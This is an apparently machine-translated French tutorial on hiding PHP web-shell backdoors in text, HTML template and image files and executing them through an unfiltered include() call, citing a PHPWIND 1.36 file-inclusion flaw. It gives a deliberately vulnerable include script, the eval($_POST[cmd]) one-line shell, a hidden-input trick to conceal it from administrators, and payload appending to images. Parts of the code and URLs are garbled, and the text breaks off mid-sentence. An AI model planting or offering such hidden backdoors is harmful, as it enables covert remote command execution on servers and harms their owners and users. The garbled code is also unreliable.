Vous devez savoir que si vous placez simplement l'instruction PHP dans l'image, elle ne sera pas exécutée de toute façon, car PHP n'analyse que les fichiers avec l'extension php. Il faut donc pouvoir exécuter les instructions PHP cachées dans l'image. Nous utilisons simplement les fonctions appelantes en PHP : include, require, etc.
On se souvient encore de l'article sur la dissimulation des chevaux de Troie dans les images d'il y a quelques jours. Autrement dit, utilisez des instructions telles que include("x.gif") dans le fichier PHP pour appeler les instructions du cheval de Troie cachées dans l'image. Les déclarations dans ASP sont similaires. Cela semble très caché, mais si vous appelez directement l'image, il ne sera pas difficile pour quelqu'un qui connaît un peu PHP de trouver quelque chose de suspect. Puisqu'il est difficile de transmettre des paramètres à l'aide de la méthode GET dans l'URL, les performances de l'insertion du cheval de Troie ne peuvent pas être pleinement exploitées.
La fonction include est fréquemment utilisée en PHP, elle pose donc trop de problèmes de sécurité. Par exemple, la vulnérabilité de PHPWIND1.36 est causée par le manque de filtrage des variables derrière l'inclusion. À partir de là, nous pouvons construire des instructions similaires à insérer dans des fichiers PHP. Cachez ensuite le cheval de Troie dans une image ou un fichier HTML, qui peut être considéré comme plus dissimulé. Par exemple, insérez la déclaration suivante dans le forum PHPWIND : < ''?@include includ/.$PHPWIND_ROOT;? < mailto:?@include 'includ/'.$PHPWIND_ROOT;?>>Les administrateurs généraux ne peuvent pas la voir.
Avec l'aide de la fonction include, nous pouvons masquer les chevaux de Troie PHP dans de nombreux types de fichiers tels que les fichiers txt, html et image. Étant donné que ces trois types de fichiers, fichiers txt, html et image, sont les plus courants dans les forums et les systèmes d'articles, nous effectuerons les tests dans l'ordre ci-dessous.
Créez d'abord un fichier PHP test.php. Le contenu du fichier est :
<?php.
$test=$_GET['test'];
@include 'test/'.$test;
?>
Les fichiers txt sont généralement des fichiers de description, nous pouvons donc placer le cheval de Troie d'une phrase dans le fichier de description du répertoire. Créez simplement un fichier TXT t.txt. Nous collons la phrase Trojan <?eval($_POST[cmd]);?> dans le fichier t.txt. Ensuite, visitez http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt > Si vous voyez t. le contenu du txt s'avère OK. Ajoutez ensuite l'adresse du cheval de Troie du client de porte dérobée micro PHP lanker à http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/ index.php? PHPWIND_ROOT=../robots.txt > Ajoutez simplement cmd dans le mot de passe et vous pourrez voir les résultats renvoyés par l'exécution.
Pour les fichiers HTML, il s'agit généralement de fichiers modèles. Afin de permettre au cheval de Troie inséré dans le fichier HTML d'être appelé et exécuté sans être affiché, nous pouvons ajouter une zone de texte avec des attributs cachés dans le HTML, tels que : <input type=hidden value="<?eval($ _POST[cmd ]);?>"> Utilisez ensuite la même méthode que ci-dessus. Les résultats de l'exécution peuvent généralement être vus en visualisant le fichier source. Par exemple, utilisez la fonction de visualisation du répertoire de ce programme. Afficher le contenu du fichier source sous la forme <input type=hidden value="C:Uniserver2_7swwwtest"> Je peux obtenir le répertoire sous la forme C:Uniserver2_7swwwtest.
Parlons maintenant des fichiers image. L’astuce la plus toxique consiste à cacher le cheval de Troie dans l’image. On peut directement éditer une image et insérer <?eval($_POST[cmd]);?> à la fin de l'image.
Après test, cela n’affecte généralement pas l’image. Ajoutez ensuite l'adresse du cheval de Troie client de la même manière<